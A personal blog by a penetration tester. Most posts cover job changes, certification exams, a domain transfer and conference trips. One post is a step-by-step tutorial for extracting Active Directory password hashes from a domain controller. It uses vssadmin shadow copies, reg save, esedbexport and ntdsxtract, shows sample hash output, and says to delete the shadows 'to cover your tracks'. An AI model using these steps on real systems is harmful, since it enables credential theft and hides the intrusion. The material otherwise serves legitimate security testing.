Moving from WordPress to Blogger Hassles

Have been attempting to move from WordPress to Blogger, and failing miserably at it.

There seems to be no useful tools still available that will parse the WordPress export to a usable file to import to Blogger. At one time there was several tools, and many sites to assist with this. I guess that has gone and many are no longer available or working.

Downloaded several scripts that say they work on converting the data to the correct format, all have failed me. Tried some websites, and they all barf on me that my file is either incorrect format or is too large.

Currently have moved one article over, with many format changes needed, it took me about an hour to get it in a readable format.

Attempting to move articles over one at a time is a time consuming, guess I will only move the important ones over and trash the others.

Starting a new Job

I have Left Sword & Shield to take a better opportunity with Coalfire Systems.
There were multiple reasons for leaving Sword & Shield, and most of them are related to one individual that has moved up the ranks in the company. He was originally hired to do report reviews five years back, and is now the Senior VP of services. Since his move into management there has been a drastic exodus of highly qualified personnel from the company. One major issue is that the CEO/President, Executive VP and COO do not even notice the main reason for the high personnel turnover.
Since I turned in my notice, the CEO and COO have completely ignored me. Walking down the hallway, I always say hello to everyone, and usually get a hello back from whomever is there. Not lately; had multiple encounters with the C suite and they literally walk past me as if I was not there.
I wish all my former colleagues well in there endeavors and hope things get better.

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I have been currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customers doing PCI work. Usually never works out in my favor, and makes for working long hours, with no compensation for it.
My bosses boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill me on the team, but another person left in November leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLMSYSTEM c:SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
 • libesedb
• ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
 Runing esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
–sid <user sid>
List user identified by SID
–guid <user guid>
List user identified by GUID
–name <user name regexp>
List user identified by the regular expression
–active
List only active accounts
–locked
List only locked accounts
–syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
–lmoutfile <name of the LM hash output file>
–ntoutfile <name of the NT hash output file>
–pwdformat <format of the hash output>
ophc – OphCrack format
When this format is specified the NT output file will be used
john – John The Ripper format
ocl – oclHashcat format
When this format is specified the NT output file will be used
–passwordhashes
Extract password hashes
–passwordhistory
Extract password history
–certificates
Extract certificates
–supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
–membership
List groups of which the user is a member
–csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
–debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
–lmoutfile (output file for LM hashes)
–ntoutfile (output file for NTLM hashes
–pwdformat john (output in JTR format)
–syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> –passwordhashes –lmoutfile <LM OUT FILE> –ntoutfile <NTLM OUT FILE> –pwdformat john –syshive <SYSTEM FILE>
(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…

PCI-QSA Training

Spent the past 2 days in Boston in the PCI-QSA training class. Taking the exam the last hour and a half of the class, but will not know the results until a week or two later. The Class was interesting, and I learned a little bit of information from the instructor on his perspective of doing assessments. I meat several interesting people, from all over the world, and working for different companies. I though it very interesting talking to the people working for the accounting firms, and how they were using the QSA certification with their clients. Most of them were doing just gap analysis and not actually signing ROCs for clients.
Well hope to hear if I passed….  

Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. Have been procrastinating for several months before I had to finally break down and take the certification before my time expired in late April 2015.
Spent a few days going over the books to refresh me on the content that we went over, and took one of the practice exams and actually did not do too well on it. Never taking a SANS cert before I was not sure what to expect, and probably should have actually allowed for the 2 hours to sit the practice test. Rushed though it and guessed a lot of the questions, and did not remember going of half of the info. (Note to self actually read the questions and each answer and not just say that looks good.) Overall I was a little frustrated after the first  practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion, and not actual facts. Several of the questions had more to do with general penetration testing then actually web application testing, like needing to know the TTL from a DNS request for a domain name.
So read the books a few more days before taking the second practice test, which I did much better on, since I had some idea on what to expect on the test.Did rush though it again actually did the entire test in 48 minutes. Which is really not that great, but I just wanted to make sure I had some idea what they real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question throughly.
Sat for the exam on April 9, 2015. Finished the test and passed it fairly easily, but was some what perplexed that it had nothing similar to the practice tests. It seemed the the practice exams had nothing to do with the the actual exam. Many of the questions were topics that were in the books, but never brought up in the practice tests. Which frustrated me a little, since I had to spend a little more time looking for some of the answers, that I had not really gone over previously.
So anyone planning on sitting the exam, and that has not taken a SANS cert before, plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test, it might actually make you study information that is never asked on the exam.

Moving to Google Domains from 1and1.com

Well I am moving some of my domains to the Beta Google Domains, away from 1and1.com hosting. It has not been completely the easiest thing to do, I have unlocked my domains and disabled private registration. However, I have several sites that were still be locked an hour of changing their status. All of them finally were released to allow me to request the transfer to Google.
One main reason I am moving from 1and1.com is they continually raise their prices, and I am not a business so I do not make money from any of my sites. The other is that their mail services have become awful, unless you want move to their newer exchange mail service for a $5 per account/per month fee.
I have used them for about eight years, and originally started with their beginner package for $2.99 per month, but it is now up to $4.99 per month. While They do add some features, it seems that they make others worse for the older subscribers who do not upgrade to a better package.
The new MyWebsite package is $6.99 a month, with a few more options then I currently have, and I am guessing that my account will soon receive a price update to be closer to that price. Along with the price updates to all domain names I have registered, they use to cost me between $6.99 to $8.99, and are now all $14.99 per domain. Since I have 17 domains, that has made a drastic price increase to my costs to host websites. Another thing they pissed me off about was they sent a notice that they were discontinuing the use of PHP 5.2, so I migrated all of my systems to 5.4 or 5.5. They forgot to mention that I needed to discontinue the support for 5.2 in my billing, and billed me $4.99 for a month of support. They never mentioned that I had to do this or that it was added to my billing and I have to remove it.
Had always had an issue with the 1and1.com limited MySQL DB support, only allowing 100MB of data in one database is a little crappy. Especially when I can have a bunch of DB instances but only 100MB on each one, it makes it a pain to have to program to use multiple DB instances on a web site.
Transferred nine domains and was notified that it takes 5 days for 1and1.com to transfer the domain to the new provider, they stat that: “1&1 will release the domain after five(5) days as required by ICANN if there are no restrictions, disputes, etc.” I guess I will have to wait and see how things will be at Google, and will give me sometime to figure out what I want to point the domain names to. I have moved one to Bitbucket repo already, and will just keep it pointed there once it is moved.
Will see how things go, and will need to move six more domains, but they are all used for email, and am not sure how long the outage will be on them. I will have to test one to see how things go, and what the outage on email will be. Then I have one that is tied to the main account for 1and1.com, and not sure how that will work to transfer it since it is tied to the hosting package. It is also the domain that is hosting this blog, so I will need to figure out where to host this site that will have access to PHP and MySQL, to allow me to host a couple web applications.

SANS SEC 542 – Washington DC CDI

Attended SANS SEC 542 Web App Penetration Testing and Ethical Hacking class in Washington DC at the Grand Hyatt from December 12 – 17 2014.
The instructor was Eric Conrad, and the class was fairly decent, and is a good start for anyone wanting to learn web application pentesting. I already had some extensive knowledge of web app testing, but decide to take the course anyways to see what SANS course were like.
Learned a few things, but primarily new most of the course material, most of the new things I learned are tool related. I do not usually use ZAP or W3AF, and since we used them in class I learned a few things about them and their capabilities.
There was a wide variety of people in the class, with about 30 students in the class room and about 15 online students. We had some that had no pentesting abilities, and some with a couple years experience.
The class was a six day course:
      DAY 1 : Attacker’s View, Pentesting and Scoping
      DAY 2 : Recon & Mapping
      DAY 3 : Discovery
      DAY 4 : Discovery Continued
      DAY 5 : Exploitation
          DAY 6 : Capture the Flag
My team completed the CTF first, but Eric Conrad could not decide who yelled out first so he called it a tie with the team sitting just behind us.
The biggest things I learned from the class was actually not taught in the class room, it was talking to the people there who are doing pentesting and works in the security community. Plus the additional talks that were held after classes were well worth staying up late and not going sight seeing around DC.
Now I just need to figure out how to get my boss to allow me to attend another one next year.

Derbycon 4.0

Well Derbycon 4.0 is over, and now things have to go back to normal.
My boss has already scheduled me 3 new projects, and I have not finished last weeks projects because I was too excited to get to Derbycon.
Completed the Urban Bourbon Trail (all in half a day, which I do not recommend unless you have the full day). Started at 2pm on Thursday after arriving at the Hyatt in Louisville KY. and was done by 8pm that night. Felt terrible most of Friday morning but did not stop me from getting in on the CTF.
Had a blast at Derbycon, spent most of my time playing CTF and hanging out with friends.
Team nanerpwn came in 2nd place in the CTF, and we had a good lead for most of the time on Friday and Saturday. Could not hold on to the lead towards the end, had a few people drop off to head back home early. So maybe next year we will come in 1st, if we can get everyone to stay until Sunday afternoon.
Ready for Derbycon 5.0

Bahrain – Working for another manager is trying my patience

Well I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people, they are great and were a joy to work with.
As for the project that my company is contracted on, I am a little pissed that nothing has really been done, since I last left from working over here. Well none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.
The two people that were hired to come over here and work for the last year, which are not security minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and they took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks, there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and  only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected, I tried to let him know, and he did not see to want to hear it. I dropped the conversations and began working on a solution to the issue.
I am ready to get back to pentesting, where I can actually do some good, well I will keep telling my self that. Many of my customers, just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.